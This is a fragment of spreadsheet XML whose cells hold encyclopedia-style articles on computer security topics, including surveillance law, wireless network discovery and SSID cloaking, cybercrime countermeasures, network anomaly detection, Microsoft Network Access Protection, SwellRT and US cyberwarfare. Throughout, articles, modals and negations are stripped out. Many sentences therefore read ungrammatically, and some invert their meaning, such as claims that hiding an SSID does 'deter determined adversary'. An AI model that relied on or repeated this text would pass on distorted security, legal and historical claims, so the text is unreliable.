items.” court orders issued electronic surveillance allow federal officials electronic surveillance includes eavesdropping without violating electronic communications privacy title specifically. organization economic cooperation development (oecd) guideline protecting privacy data health patients issued organization economic cooperation development (oecd). policy states individual patient data personal data secure, patients face arbitrary losses related invading personal information health conditions. policy acts minimum standard ehealth usages followed medical institutes protecting privacy patient’s data. also black (computer security) crowdsensing eavesdropping endpoint detection response endpoint security intrusion detection system packet analyzer security hacker phreaking references</t>
  </si>
  <si>
    <t>Computer and network surveillance</t>
  </si>
  <si>
    <t>Network detector</t>
  </si>
  <si>
    <t>network detectors network discovery software computer programs facilitate detection wireless lans using 802.11b, 802.11a 802.11g wlan standards. discovering networks done active well passive scanning. active scanning active scanning done sending multiple probe requests recording probe responses. probe response received normally contains bssid wlan ssid. ssid broadcasting turned off, active scanning type scanning supported software, networks show example active scanner netstumbler. passive scanning passive scanning done active probing, mere listening data sent once legitimate user connects eventually send ssid cleartext. impersonating automatic altering address, computer running network discovery scanner given ssid legitimate users. passive scanners include kismet essid jack program airjack). notable programs notable programs include network stumbler, kismet, lumeta corporation, aerosol, airmagnet, macstumbler, ministumbler, mognet, netchaser, perlskan, wireless security auditor, wlandump, pocketwarrior, pocketwinc, prismstumbler, sniff-em, airopeek, airscanner, scanner, radar, apsniff, bsd-airtools, dstumbler, gtk-scanner, gwireless, istumbler, kismac, sniffer wireless, thc-scan, thc-wardrive, warglue, warkizniz, wellenreiter, wi-scan wistumbler. references</t>
  </si>
  <si>
    <t>Network cloaking</t>
  </si>
  <si>
    <t>network cloaking attempt provide wireless security hiding network name (service identifier) broadcast publicly. many routers come option standard feature setup menu accessed browser. network cloaking stop inexperienced users gaining access network, otherwise considered minimal security measure. network cloaking less effective using static (which vulnerable, wired equivalent privacy). more secure forms wireless security include (wi-fi protected access) preferably wpa2. possible wep, wpa, wpa2, encryption technologies used conjunction hiding ssid. advantages minimal security benefit hiding network name prevent less technically inclined people connecting network, deter determined adversary. wpa2 recommended instead. hiding ssid removes beacon frames, several ways ssid discovered. when chooses hide network name router's setup page, sets ssid beacon frame null, remain four ways ssid transmitted. fact, hiding broadcast ssid router cause network interface controller (nic) constantly disclose ssid, even range. usability improvement hiding network name improves experience users connecting wireless networks dense areas. when network intended public broadcast ssid, appear list available networks clients. this simplifies choice users. organisations decide cloak wi-fi ssid intended used employees pre-configured corporate devices keep networks intended visitors (i.e., “guest networks”) broadcasting ssid. this way, authorized users connect corporate network pre-configured visitors “guest network” less confused ssid use. disadvantages false sense security although network cloaking small sense security, common people realise easy discover hidden networks. because various ways ssid broadcast, network cloaking considered security measure. using encryption, preferably wpa2, secure. even wep, weak vulnerable, provides security hiding ssid. there many programs able scan wireless networks, including hidden ones, display information addresses, ssids, encryption types. these programs capable "sniffing" wireless networks range essentially eavesdropping analysing network traffic packets gather information specific networks. reason programs sniff hidden networks ssid transmitted various frames, displayed cleartext (unencrypted format), therefore able read anyone found eavesdropper passively sniff wireless traffic network undetected (with software like kismet), wait someone connect, revealing ssid. alternatively, faster (albeit detectable) methods cracker spoofs “disassociate frame” came wireless bridge, sends clients connected; client immediately re-connects, revealing ssid. some examples sniffing programs include following: passive: kismac kismet prads essid-jackactive: netstumbler inssiderthe downside passive scanning order gather information, client already connected specific network needs generating therefore providing network traffic analysed. these programs able discover cloaked networks ssids picking frames information probe request frames. probe request frames sent unencrypted client computer trying connect network. this unprotected frame information, easily intercepted read someone willing, contain ssid. probe response frames. response probe request, requested station send back frame information also containing ssid well details network. association request frames. association request frame begins process initialising relationship computer access point. once associated properly, able assign resources network interface controller (nic). once again, process, ssid transmitted. re-association request frames. re-association request frames transmitted notices stronger signal another access point switches previous one. this access point "take over" handle data still caught previous session. request connection beacon signal course require transmission ssid.because multiple ways network name still broadcast network "cloaked,” completely hidden persistent hackers. worse still, station must probe hidden ssid, fake access point offer connection. programs fake access points freely available; e.g. airbase-ng karma. references</t>
  </si>
  <si>
    <t>Computer crime countermeasures</t>
  </si>
  <si>
    <t>cyber crime, computer crime, refers crime involves computer network. computer used commission crime, target. netcrime refers, precisely, criminal exploitation internet. issues surrounding type crime become high-profile, particularly surrounding hacking, copyright infringement, identity theft, child pornography, child grooming. there also problems privacy confidential information lost intercepted, lawfully otherwise. global level, governments non-state actors continue grow importance, ability engage activities espionage, cross-border attacks sometimes referred cyber warfare. international legal system attempting hold actors accountable actions, international criminal court among addressing threat.a cyber countermeasure defined action, process, technology, device, system serves prevent mitigate effects cyber attack victim, computer, server, network associated device. recently increase number international cyber attacks. 2013 increase targeted attack campaigns increase security breaches.a number countermeasures exist effectively implemented order combat cyber-crime increase security. types threats malicious code malicious code broad category encompasses number threats cyber-security. essence “hardware, software, firmware intentionally included inserted system harmful purpose.” commonly referred malware includes computer viruses, worms, trojan horses, keyloggers, bots, rootkits, software security exploits.malicious code also includes spyware, deceptive programs, installed without authorization, “that monitor consumer’s activities without consent.” spyware used send users unwanted popup ads, usurp control user’s internet browser, monitor user’s online habits. however, spyware usually installed along something user actually wishes install. user consents installation, consent monitoring tactics spyware. consent spyware normally found end-user license agreement. akua network attacks network attack considered action taken disrupt, deny, degrade, destroy information residing computer computer networks. attack take four forms: fabrication, interception, interruption, modification. fabrication “creation deception order deceive unsuspecting user”; interception “process intruding transmission redirecting unauthorized use”; interruption “break communication channel, inhibits transmission data”; modification “the alteration data contained transmissions.” attacks classified either active passive. active attacks involve modification transmission attempts gain unauthorized access system, passive attacks involve monitoring transmissions. either form used obtain information user, later used steal user’s identity. common forms network attacks include denial service (dos) distributed denial service(ddos), man-in-the-middle attack, packet sniffing, flood, icmp flood, spoofing, even simple defacement. network abuse network abuses activities violate network's acceptable policy generally considered fraudulent activity committed computer. spam common forms network abuse, individual email list users usually unsolicited advertisements phishing attacks attempting social engineering acquire sensitive information information useful identity theft, usernames, passwords, posing trustworthy individual. social engineering social engineering manipulating people performing actions divulging confidential information, rather breaking using technical cracking techniques. this method deception commonly used individuals attempting break computer systems, posing authoritative trusted party capturing access information naive target. email phishing common example social engineering's application, limited single type attack. technical there variety different technical countermeasures deployed thwart cybercriminals harden systems attack. firewalls, network host based, considered first line defense securing computer network setting access control lists (acls) determining services traffic pass check point.antivirus used prevent propagation malicious code. most computer viruses similar characteristics allow signature based detection. heuristics file analysis file emulation also used identify remove malicious programs. virus definitions regularly updated addition applying operating system hotfixes, service packs, patches keep computers network secure.cryptography techniques employed encrypt information using algorithm commonly called cipher mask information storage transit. tunneling example take payload protocol internet protocol (ip) encapsulate encrypted delivery protocol virtual private network (vpn), secure sockets layer (ssl), transport layer security (tls), layer tunneling protocol (l2tp), point-to-point tunneling protocol (pptp), internet protocol security (ipsec)to ensure data security transmission. encryption also employed file level using encryption protocols like data encryption standard (des), triple des, advanced encryption standard (aes) ensure security information storage.additionally, network vulnerability testing performed technicians automated programs used test full-scale targeted specifically devices, systems, passwords used network assess degree secureness. furthermore, network monitoring tools used detect intrusions suspicious traffic large small networks.physical deterrents locks, card access keys, biometric devices used prevent criminals gaining physical access machine network. strong password protection access computer system computer's bios also effective countermeasures cyber-criminals physical access machine.another deterrent bootable bastion host executes browser known clean secure operating environment. host devoid known malware, data never stored device, media cannot overwritten. kernel programs guaranteed clean boot. some solutions used create secure hardware browsers protect users accessing online banking. counter-terror social network analysis intent recognition counter-terror social network analysis intent recognition (ct-snair) project uses terrorist action description language (tadl) model simulate terrorist networks attacks. also models links identified communication patterns compiled multimedia data, terrorists’ activity patterns compiled databases past terrorist threats. unlike proposed methods, ct-snair constantly interacts user, uses system investigate refine hypotheses.multimedia data, voice, text, network session data, compiled processed. through compilation processing, names, entities, relationships, individual events extracted multimedia data. this information used perform social network analysis criminal network, user detect track threats network. social network analysis directly influences influenced intent recognition process, user recognize detect threats. ct-snair process, data transactions prior attacks, forensic scenarios, compiled form sequential list transactions given terrorism scenario. ct-snair process also includes generating data hypothetical scenarios. since imagined computer-generated, hypothetical scenarios transaction data representing terrorism scenarios. different types transactions combine represent types relationships individuals. final product, target social network, weighted multiplex graph types edges (links) defined types transactions within social network. weights within graphs determined content-extraction algorithm, type link thought separate graph social network algorithms part whole.” links individuals determined existence lack people mentioned within sentence compiled multimedia data relation group event.the final component ct-snair process intent recognition (ir). goal component indicate analyst threats transaction stream might contain. intent recognition breaks three subcategories: detection “known hypothetical target scenarios,” prioritization target scenarios, interpretation resulting detection.” economic optimal level cyber-security depends largely incentives facing providers incentives facing perpetrators. providers make decision based economic payoff cost increased security whereas perpetrators decisions based economic gain cost cyber-crime. potential prisoner’s dilemma, public goods, negative externalities become sources cyber-security market failure private returns security less social returns. therefore, higher ratio public private benefit stronger case enacting public policies realign incentives actors fight cyber-crime increased investment cyber-security. legal united states number legal statutes define detail conditions prosecution cyber-crime used legal counter-measure, also functions behavioral check commission cyber-crime. many provisions outlined acts overlap each. computer fraud abuse computer fraud abuse passed 1986 broadest statutes used combat cyber-crime. amended number times, recently patriot 2002 identity theft enforcement restitution 2008. within definition “protected computer” used throughout legal system define computer espionage, computer trespassing, taking government, financial, commerce information, trespassing government computer, committing fraud protected computer, damaging protected computer, trafficking passwords, threatening damage protected computer, conspiracy commit cyber-crime, penalties violation. 2002 update computer fraud abuse expands include protection “information protected computer conduct involved interstate foreign communication.” digital millennium copyright digital millennium copyright passed 1998 united states copyright criminalizes production dissemination technology, devices, services intended circumvent digital rights management (drm), circumvention access control. electronic communications privacy electronic communications privacy 1986 extends government restrictions wiretaps telephones. this generally thought perspective enforcement intercept communications, also pertains organization draft acceptable policies monitor communications. stored communications stored communications passed 1986 focused protecting confidentiality, integrity availability electronic communications currently form electronic storage. this drafted purpose protecting privacy e-mails electronic communications. identity theft aggravated identity theft identity theft aggravated identity theft statute subsection identification authentication fraud statute. defines conditions individual violated identity theft laws. identity theft assumption deterrence identity theft declared unlawful federal identity theft assumption deterrence 1998 (itada). criminals knowingly transferring using, without lawful authority, means identification another person intent commit, abet, unlawful activity constitutes violation federal law, constitutes felony applicable state local law.” penalties itada include years prison maximum fine $250,000 directly reflect amount damage caused criminal’s actions amount planning intent. gramm-leach-bliley gramm-leach-bliley (glba) requires financial institutions credit agencies increase security systems contain customers’ personal information. mandates financial institutions “design, implement, maintain safeguards protect customer information.” internet spyware prevention internet spyware prevention (i-spy) prohibits implementation spyware adware. i-spy also includes sentence “intentionally accessing computer intent install unwanted software.” access device fraud statutes u.s.c. 1029 outlines different offenses offender could violate concerning device fraud. these offenses include: knowingly trafficking counterfeit access device trafficking counterfeit access device intention committing fraud possessing devices purpose defraud production/possession/trafficking equipment create access devices intent defraud receiving payment individual excess $1,000 one-year period found using illegal access devices solicitation another individual offers sell illegal access devices distributing possessing altered telecommunication device purpose obtaining unauthorized telecommunication services production, possession, trafficking scanning receiver using possessing telecommunication device knowingly altered provide unauthorized access telecommunication service using credit card illegally obtained used purchase goods services can-spam can-spam 2003 establishes united states' first national standards sending commercial e-mail requires federal trade commission (ftc) enforce provisions. wire fraud statute wire fraud statute outlined u.s.c. 1343 applies crimes committed different types electronic medium telephone network communications. communications interference statutes communications interference statute listed u.s.c. 1362 defines number acts individual charged telecommunications related crime including: maliciously destroying property cable, system, means communication operated controlled united states maliciously destroying property cable, system, means communication operated controlled united states military willfully interfering working communications line willfully obstructing delaying communication transmission communications line conspiracy commit listed acts behavioral behavioral countermeasures also effective tool combating cyber-crime. public awareness campaigns educate public various threats cyber-crime many methods used combat also businesses also make policies help educate train workers importance practices used ensure electronic security strong password use, importance regular patching security exploits, signs phishing attacks malicious code, etc.california, virginia, ohio implemented services victims identity theft, though well publicized. california registry victims confirmed identity theft. once registered, people request enforcement officers call number staffed hours, year round, "verify telling truth innocence.” virginia ohio, victims identity theft issued special passport prove innocence. however, passports risk every form identification eventually duplicated.financial agencies banks credit bureaus starting require verification data identity thieves cannot easily obtain. this data includes users’ past addresses income information. near future, also include data located biometrics. biometrics automated methods uniquely recognizing humans based upon intrinsic physical behavioral traits.” these methods include iris scans, voice identification, fingerprint authentication. first financial credit union already implemented biometrics form fingerprint authentication automated teller machines combat identity theft. with similar purpose, great britain announced plans incorporate computer chips biometric data passports. however, greatest problem implementation biometrics possibility privacy invasion. agents government federal trade commission (ftc) federal bureau investigation (fbi) bureau alcohol tobacco firearms (atf) federal communications commission (fcc) private organizations antivirus/security firms internet service providers (isps) messaging anti-abuse working group (maawg) consultants computer emergency response teams public–private partnerships cert coordination center, carnegie mellon university united states computer emergency readiness team (us-cert) also government resources references external links carnegie mellon university csirt empirical study email security threats countermeasures</t>
  </si>
  <si>
    <t>Network behavior anomaly detection</t>
  </si>
  <si>
    <t>network behavior anomaly detection (nbad) security technique provides network security threat detection. complementary technology systems detect security threats based packet signatures.nbad continuous monitoring network unusual events trends. nbad integral part network behavior analysis (nba), offers security addition provided traditional anti-threat applications firewalls, intrusion detection systems, antivirus software spyware-detection software. description most security monitoring systems utilize signature-based approach detect threats. they generally monitor packets network look patterns packets match database signatures representing pre-identified known security threats. nbad-based systems particularly helpful detecting security threat vectors instances signature-based systems cannot: zero-day attacks, (ii) threat traffic encrypted command control channel certain botnets. nbad program tracks critical network characteristics real time generates alarm strange event trend detected could indicate presence threat. large-scale examples characteristics include traffic volume, bandwidth protocol use. nbad solutions also monitor behavior individual network subscribers. order nbad optimally effective, baseline normal network user behavior must established period time. once certain parameters defined normal, departure flagged anomalous. nbad technology/techniques applied number network security monitoring domains including: analysis (ii) packet inspection systems (iii) flow monitoring systems (iv) route analytics. nbad also described outlier detection, novelty detection, deviation detection exception mining. popular threat detections within nbad payload anomaly detection protocol anomaly: spoofing protocol anomaly: spoofing protocol anomaly: tcp/udp fanout protocol anomaly: fanout protocol anomaly: duplicate protocol anomaly: duplicate virus detection bandwidth anomaly detection connection rate detection commercial products palo alto networks cortex darktrace enterprise immune system antigena autonomous response allot communications allot communications ddos protection arbor networks arbor network security intelligence cisco stealthwatch (formerly lancope stealthwatch) qradar (since 2003) enterasys networks enterasys dragon exinda inbuilt (application performance score (aps), application performance metric (apm), sla, adaptive response) extrahop networks revealx flowmon networks flowmon flownba netflow juniper networks strm fidelis cybersecurity network security lastline mcafee mcafee network threat behavior analysis procurve network immunity manager riverbed technology riverbed cascade sourcefire sourcefire symantec symantec advanced threat protection greycortex mendel (formerly trustport threat intelligence) vectra zoho corporation manageengine netflow analyzer's advanced security analytics module microsoft corp windows defender advanced threat analytics vehere packetworker network detection response also user behavior analytics references</t>
  </si>
  <si>
    <t>Network Access Protection</t>
  </si>
  <si>
    <t>network access protection (nap) microsoft technology controlling network access computer, based health. with nap, system administrators organization define policies system health requirements. examples system health requirements whether computer recent operating system updates installed, whether computer latest version anti-virus software signature, whether computer host-based firewall installed enabled. computers client health status evaluated upon establishing network connection. restrict deny network access computers compliance defined health requirements. deprecated windows server 2012 removed windows server 2016. overview network access protection client agent makes possible clients support evaluate software updates statement health. clients computers report system health enforcement point. enforcement point computer device evaluate client's health optionally restrict network communications. enforcement points ieee 802.1x-capable switches servers, dhcp servers, health registration authorities (hras) windows server 2008 later. health policy server computer running network policy server (nps) service windows server 2008 later stores health requirement policies provides health evaluation clients. health requirement policies configured administrators. they define criteria clients must meet allowed undeterred connection; criteria include version operating system, personal firewall, up-to-date antivirus program. when nap-capable client computer contacts enforcement point, submits current health state. enforcement point sends client's health state health policy server evaluation using radius protocol. health policy server also radius-based authentication server client. health policy server health requirement server validate health state client determine current version software updates need installed client. example, health requirement server might track latest version antivirus signature file. enforcement point hra, obtains health certificates certification authority clients deems compliant relevant requirements. clients placed restricted network deemed non-compliant. restricted network logical subset intranet contains resources allow noncompliant client correct system health. servers contain system health components updates known remediation servers. noncompliant client restricted network access remediation servers install necessary components updates. after remediation complete, client perform health evaluation conjunction request network access communication. client support client ships windows vista, windows windows windows windows limited client also included windows service pack snap-in support authip-based ipsec enforcement. such, managed command-line tool called netsh, ipsec enforcement ike-based only.microsoft partners provide clients operating systems macos linux. also access control network admission control network access control network security computer security packetfence references external links microsoft's network access protection page microsoft's network access protection page microsoft technet blog microsoft technet microsoft's network access protection design guide microsoft technet microsoft's network access protection deployment guide microsoft technet microsoft's network access protection troubleshooting guide microsoft technet</t>
  </si>
  <si>
    <t>SwellRT</t>
  </si>
  <si>
    <t>swellrt free open-source backend-as-a-service focused ease development apps featuring real-time collaboration. supports building mobile apps, aims facilitate interoperability federation. history origins swellrt origins work done within grasia research team universidad complutense madrid, part eu-funded project p2pvalue (2013-2016), team samer hassan. 2014, developer pablo ojanguren took lead forking apache wave, dropping several components, re-engineering building "wave api" build applications top. 2015, wave became standalone product named swellrt. impact apache wave project 2016, several discussions took place within apache wave community, aiming tackle stagnation crisis state project. apache software foundation mentor apache wave, upayavira, concerned project stagnation, framed swellrt wave's potential savior:once wave brink retirement. however, time, offer made code swellrt, fork wave itself, concall scheduled interested parties discuss whether go-er. (limited) understanding many complexity issues wave code prevented community development resolved swellrt. eventually, wave approved continue within apache incubator program, copy swellrt codebase placed apache wave repository order grant wave community access regard, intellectual property swellrt transferred apache foundation 2017. recent recognition 2016 2017, swellrt participated google summer code part projects berkman klein center internet society harvard university. years, contributions highly relevant. 2016, swellrt replaced xmpp-based federation protocol (inherited apache wave) matrix.org federation protocol. 2017, end-to-end encryption implemented, following innovative approach encrypt communication operational transformation collaborative documents.swellrt received international recognition within fields decentralized technologies real-time collaboration. decentralized summit, organized internet archive francisco, selected current innovative decentralization technologies. also selected redecentralize advocacy group, redecentralization projects whose founders interviewed, launched international contest develop apps using swellrt, awarded free/open source developers india. project presented invited talk center research computation society harvard's school engineering applied sciences, several international conferences. swellrt first adopters contributor covenant code conduct. technical approach swellrt fork apache wave, inherits architecture technology stack. however, grew beyond limits wave, first presenting framework nowadays growing backend-as-a-service platform. current technical approach covers following: fully free/open source software. developed java. jsinterop used generate javascript reusing source code. android client also built java sources. provides extensible pluggable rich-text editor component (only) supporting custom annotations widgets. real-time data storage based wave's operational transformations model, thus eventually consistent. designed maximize interoperability, follows federation approach similar apache wave, using xmpp matrix.org communication protocol. aims support creation apps federated, i.e. rely multiple interoperable servers, objects shared across servers. this allows organizations control data. collaborative objects swellrt provides programming model based collaborative objects. collaborative object json-like object shared users groups) make changes real-time. changes propagated (and notified) real-time user connected object. collaborative object store properties simple data types (string, integers, etc.) well rich-text references files attachments. this approach suitable implement document based collaborative application like text editors spreadsheets. objects participants uniquely identified internet enabling decentralized access different federated servers. main features real-time storage (nosql) user management event based integration federation (xmpp matrix.org) applications using swellrt swellrt facilitates development mobile/web apps, thus several apps built using technology. apart demos provided swellrt, third-parties developed demo apps site, extension extract keywords, collaborative scrollbar, political participation android app, trello-swellrt connector. besides, fully-fledged apps currently using swellrt technology: jetpad, googledoc-like collaborative editor, free/open source federated teem, free/open source web/mobile management communities collectives also apache wave real-time text collaborative real-time editor operational transformation federated social network references external links official website swellrt github</t>
  </si>
  <si>
    <t>National Infrastructure Protection Plan</t>
  </si>
  <si>
    <t>national infrastructure protection plan (nipp) document called homeland security presidential directive aims unify critical infrastructure resource (cikr) protection efforts across country. latest version plan produced 2013 nipp's goals protect critical infrastructure resources ensure resiliency. generally considered unwieldy actual plan carried emergency, useful mechanism developing coordination government private sector. nipp based model laid 1998 presidential decision directive-63, identified critical sectors economy tasked relevant government agencies work sharing information strengthening responses attack. nipp structured create partnerships government coordinating councils (gcc) public sector sector coordinating councils (scc) private sector eighteen sectors identified critical. sector specific agencies sector coordinating councils references 2013 supplement executing risk management approach</t>
  </si>
  <si>
    <t>Crowd control barrier</t>
  </si>
  <si>
    <t>crowd control barriers (also referred crowd control barricades, versions called french barrier bike rack usa, mills barriers hong kong), commonly used many public events. they frequently visible sporting events, parades, political rallies, demonstrations, outdoor festivals. event organizers, venue managers, security personnel barricades part crowd management planning. history nadar brussels mayor jules anspach credited invention crowd control barrier occasion visit french photographer nadar brussels. visit brussels balloon géant, september 1864, anspach erected mobile barriers keep crowd safe distance. day, crowd control barriers known belgian dutch belgian french nadar barriers. interlocking steel barriers patented france 1951. also chicane (barrier) crowd control temporary fencing vinyl fence privacy fencing crowd manipulation 2009 birmingham millennium point stampede notes external links article sawhorses used crowd control facility manager article steel barrier stability windy conditions york daily news article steel barrier york city</t>
  </si>
  <si>
    <t>Cyberwarfare in the United States</t>
  </si>
  <si>
    <t>cyberwarfare computer technology disrupt activities state organization, especially deliberate attacking information systems strategic military purposes. major developed economy, united states highly dependent internet therefore greatly exposed cyber attacks. time, united states substantial capabilities defense power projection thanks comparatively advanced technology large military budget. cyber warfare presents growing threat physical systems infrastructures linked internet. malicious hacking domestic foreign enemies remains constant threat united states. response growing threats, united states developed significant cyber capabilities. united states department defense recognizes computers internet conduct warfare cyberspace threat national security, also platform attack.the united states cyber command centralizes command cyberspace operations, organizes existing cyber resources synchronizes defense u.s. military networks. armed forces unified combatant command. 2021 report international institute strategic studies placed united states world's foremost cyber superpower, taking account cyber offense, defense, intelligence capabilities. department defense cyber strategy april 2015, u.s. department defense (dod) published latest cyber strategy building upon previous strategy operating cyberspace published july 2011. cyber strategy focuses building capabilities protect, secure, defend networks, systems information; defend nation cyber attacks; support contingency plans. this includes prepared operate continue carry missions environments impacted cyber attacks. outlines three cyber missions: defend networks, systems, information. defend united states interests cyber attacks significant consequence. provide integrated cyber capabilities support military operations contingency plans.in addition, cyber strategy emphasizes need build bridges private sector, best talent technology united states offer disposal dod. five pillars five pillars base department defense's strategy cyber warfare. first pillar recognize domain warfare cyberspace similar elements battlespace. objectives pillar build technical capabilities accelerate research development provide united states technological advantage. second pillar proactive defenses opposed passive defense. examples passive defense computer hygiene firewalls. balance attacks requires active defense using sensors provide rapid response detect stop cyber attack computer network. this would provide military tactics backtrace, hunt attack enemy intruder. third pillar critical infrastructure protection (cip) ensure protection critical infrastructure developing warning systems anticipate threats. fourth pillar collective defense would provide ability early detection, incorporate cyber warfare defense structure. goal pillar explore options face conflict, minimize loss life destruction property. fifth pillar building maintaining international alliances partnerships deter shared threats, remain adaptive flexible build alliances required. this focused "priority regions, include middle east, asia-pacific, europe". trump administration's national cyber strategy shortly election, u.s. president donald trump pledged deliver extensive plan improve u.s. cybersecurity within days inauguration. three weeks designated 90-day mark, signed executive order claimed strengthen government networks. executive order, federal-agency leaders held responsible breaches networks federal agencies follow national institute standards technology framework improving critical infrastructure cybersecurity consolidating risk management practices. addition, federal departments examine cyber defense abilities agencies within days, focusing "risk mitigation acceptance choices" evaluating needs funding sharing technology across departments. experts cybersecurity later claimed order "not likely" major impact.in september, president trump signed national cyber strategy- "the first fully articulated cyber strategy united states since 2003." john bolton, national security advisor, claimed september 2018 trump administration's "national cyber strategy" replaced restrictions offensive cyber operations legal regime enables defense department relevant agencies operate greater authority penetrate foreign networks deter hacks u.s. systems. describing strategy endeavor "create powerful deterrence structures persuade adversary strike first place," bolton added decision-making launching attacks moved chain command requiring president's approval.the defense department, strategy document released september 2018, announced would "defend forward" u.s. networks disrupting "malicious cyber activity source" endeavor "ensure consequences irresponsible cyber behavior" "preserving peace strength."the national cyber strategy also garnered criticisms evaluating acts cyberwarfare united states still remains ambiguous, current u.s. specifically define constitutes illegal cyber transcends justifiable computer activity. legal status information security research united states governed 1986 computer fraud abuse act, derided "poorly drafted arbitrarily enforced" enabling prosecution useful information security research methods nmap shodan. even needed services fall prohibition, top-level information security experts find challenging improve infrastructure cyberdefense. cyberattack 2011, white house published "international strategy cyberspace" reserved right military force response cyberattack: 2013, defense science board, independent advisory committee u.s. secretary defense, went further, stating "the cyber threat serious, potential consequences similar ways nuclear threat cold war," recommending, response "most extreme case" (described "catastrophic full spectrum cyber attack"), "nuclear weapons would remain ultimate response anchor deterrence ladder." attacks nations iran june 2010, iran victim cyber attack nuclear facility natanz infiltrated cyber-worm 'stuxnet', said advanced piece malware ever discovered significantly increases profile cyberwarfare. destroyed perhaps 1,000 nuclear centrifuges and, according business insider article, "[set] tehran's atomic program back least years."despite lack official confirmation, gary samore, white house coordinator arms control weapons mass destruction, made public statement, said, "we're glad [the iranians] trouble centrifuge machine we—the allies—are everything make sure complicate matters them", offering "winking acknowledgement" involvement stuxnet. china 2013, edward snowden, former systems administrator central intelligence agency (cia) counterintelligence trainer defense intelligence agency (dia), revealed united states government hacked chinese mobile phone companies collect text messages spied tsinghua university, china's biggest research institutions, well home china's major backbone networks, china education research network (cernet), internet data millions chinese citizens could mined. said u.s. agencies watching china hong kong years.according classified documents provided edward snowden, national security agency (nsa) also infiltrated servers headquarters huawei, china's largest telecommunications company largest telecommunications equipment maker world. plan exploit huawei's technology company sold equipment countries—including allies nations avoid buying american products—the could roam computer telephone networks conduct surveillance and, ordered president, offensive cyberoperations. russia june 2019, russia said electrical grid could cyber-attack united states. york times reported american hackers united states cyber command planted malware potentially capable disrupting russian electrical grid. others 1982, computer control system stolen canadian company soviet spies caused soviet pipeline explode. alleged code control system modified include logic bomb changed pump speeds cause explosion, disputed. april 1991 article infoworld magazine "meta-virus unleash plague windows users" john gantz purported extremely early example cyber warfare countries. fact "af/91 virus" april fools joke misunderstood widely re-reported fact credulous media. cyber threat information sharing pentagon information sharing arrangement, defense industrial base cybersecurity information assurance (dibcia) program, place private defense contractors since 2007 access widened 2012. number information sharing initiatives cyber intelligence sharing protection (cispa) cybersecurity information sharing (cisa) proposed, failed various reasons including fears could used general public. united states cyber command united states cyber command (uscybercom) united states armed forces unified combatant command. uscybercom plans, coordinates, integrates, synchronizes conducts activities defend department defense information networks and; prepare conduct "full spectrum military cyberspace operations" ensure us/allied freedom action cyberspace deny adversaries. army army cyber command (arcyber) army component command u.s. cyber command. arcyber following components: army network enterprise technology command army signal command portions information operations command (land) united states army intelligence security command operational control arcyber cyber-related actions.new cyber authorities granted national security presidential memorandum (nspm) persistent cyber engagements cyber command norm cyber operations. marine corps united states marine corps forces cyberspace command functional formation united states marine corps protect infrastructure cyberwarfare. force sixteenth force united states force component united states cyber command (uscybercom). following components: 67th cyberspace wing 688th cyberspace wing 689th combat communications wingthe f-15 c-130 systems hardened cyber attack 2019. navy navy cyber forces (cyberfor) type commanders u.s. navy's global cyber workforce. headquarters located joint expeditionary base little creek-fort story. cyberfor provides forces equipment cryptology/signals intelligence, cyber, electronic warfare, information operations, intelligence, networks, space. september 2013, united states naval academy offer undergraduate students opportunity, major cyber operations united states.fleet cyber command operating force united states navy responsible navy's cyber warfare programs. tenth fleet force provider fleet cyber command. fleet components are: naval network warfare command navy cyber defense operations command naval information operation commands combined task forces timeline systems military private research institutions penetrated march 1998 almost years incident called moonlight maze. united states department defense traced trail back mainframe computer former soviet union sponsor attacks unknown russia denies involvement. titan rain u.s. government's designation given series coordinated attacks american computer systems since 2003. attacks labeled chinese origin, although precise nature (i.e., state-sponsored espionage, corporate espionage, random hacker attacks) real identities (i.e., masked proxy, zombie computer, spyware/virus infected) remain unknown. 2007, united states government suffered espionage pearl harbor" unknown foreign power broke high tech agencies, military agencies, downloaded terabytes information. 2008, hacking incident occurred u.s. military facility middle east. united states deputy secretary defense william lynn pentagon release document, reflected "malicious code" flash drive spread undetected classified unclassified pentagon systems, establishing digital beachhead, data could transferred servers foreign control. network administrator's worst fear: rogue program operating silently, poised deliver operational plans hands unknown adversary. this significant breach u.s. military computers ever served important wake-up call", lynn wrote article foreign affairs. operation buckshot yankee, conducted united states response 2008 breach allegedly conducted russia. this operation lasted three years, starting october 2008 breach first detected. operation included attempts recognize mitigate malicious code (agent.btz), spread military computers around world. team conducting operation requested permission offensive means combating code, denied senior officials. operation buckshot yankee catalyst formation cyber command. february 2009, white house announced conduct review nation's cyber security ensure federal government united states cyber security initiatives appropriately integrated, resourced coordinated united states congress private sector. april 2009, u.s. lawmakers pushed appointment white house cyber security "czar" dramatically escalate u.s. defenses cyber attacks, crafting proposals would empower government enforce security standards private industry first time. april 2009, pentagon announced spent $100 million last months responding repairing damage cyber attacks computer network problems. from december 2009 january 2010, cyber attack, dubbed operation aurora, launched china google companies. google said attacks originated china would "review feasibility" business operations china following incident. according google, least companies various sectors targeted attacks. mcafee spokespersons claimed "this highest profile attack kind seen recent memory." february 2010, united states joint forces command released study included summary threats posed internet: "the open free flow information favored west allow adversaries unprecedented ability gather intelligence." june 2010, united states senator lieberman (i-ct) introduced bill called "protecting cyberspace national asset 2010", co-wrote senator susan collins (r-me) senator thomas carper (d-de). signed law, controversial bill, american media dubbed "kill switch bill", would grant president emergency powers parts internet. however, three co-authors bill issued statement instead, bill "[narrowed] existing broad presidential authority take telecommunications networks". august 2010, u.s. first time publicly warned chinese military's civilian computer experts clandestine cyber attacks aimed american companies government agencies. pentagon also pointed alleged china-based computer spying network dubbed ghostnet revealed research report last year. pentagon stated people's liberation army using "information warfare units" develop viruses attack enemy computer systems networks, units include civilian computer professionals. commander mehal would monitor pla's buildup cyberwarfare capabilities "will continue develop capabilities counter potential threat." 2010, american general keith alexander endorsed talks russia proposal limit military attacks cyberspace, representing significant shift u.s. policy. 2011 part anonymous attack hbgary federal information private companies endgame systems design offensive software department defense revealed. shown endgame systems applicants previously "managed team persons, responsible coordinating offensive computer network operations united states department defense federal agencies." october 2012, pentagon host contractors "want propose revolutionary technologies understanding, planning managing cyberwarfare. part ambitious program defense advanced research projects agency, darpa, calls plan public description talks 'understanding cyber battlespace', quantifying 'battle damage' working darpa's 'cyberwar laboratory.'" starting september 2012, denial service attacks, carried york stock exchange number banks including j.p. morgan chase. credit attacks claimed hacktivist group called qassam cyber fighters labeled attacks operation ababil. attacks executed several phases restarted march 2013. 2013, first tallinn manual international applicable cyber warfare published. this publication result independent study examine review laws governing cyber warfare sponsored nato cooperative cyber defence centre excellence 2009. february 2013, white house presidential executive order (e.o.) 13636 "improving critical infrastructure cybersecurity" published. this executive order highlighted policies needed improve coordinate cybersecurity, identification critical infrastructure, reduction cyber risk, information sharing private sector, ensure civil privacy liberties protections incorporated. january 